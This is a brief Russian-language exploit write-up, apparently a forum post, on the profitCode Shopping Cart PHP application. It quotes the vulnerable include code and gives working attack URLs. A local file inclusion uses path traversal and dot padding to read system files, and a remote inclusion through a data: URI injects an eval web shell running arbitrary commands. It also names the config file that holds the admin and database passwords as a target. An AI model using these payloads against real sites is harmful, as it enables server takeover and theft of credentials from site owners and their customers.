profitCode Shopping Cart
Release Date:2009-04-11
http://sourceforge.net/projects/profbiz-cart/
http://profbiz-cart.sourceforge.net/
LFI
cart.php
PHP код:
global $chckoutaction, $payMethod, $donecart, $itemcount, $thmbImgsize, $ckprvd;
include "mainincs/cartfunctions.php";
if($ckprvd) {
include ("checkouts/checkout_" . $ckprvd . ".php");
в checkouts/ есть файл checkout_cod.php, достраиваем констукцию до него
можно инклудить файлы .php
http://localhost/store/cart.php?ckprvd=cod.php/../../leftmenu
NULL-byte слешируется, поэтому для иклуда произвольного файла используем Альтернативу от Raz0r,
в моем случае это 270 точек (Windows)
Код HTML:
http://localhost/store/cart.php?ckprvd=cod.php/../../../../../../../boot.ini..............................................................................................................................................................................................................................................................................
RFI
index.php
PHP код:
else if($proMod) {
include "$proMod" . ".php";
http://localhost/store/index.php?proMod=data:,%3C?php%20eval($_REQUEST[cmd]);%20?%3E&cmd=phpinfo();
Пароли администратора и к базе хранятся в adminshop/config/shopSettings.php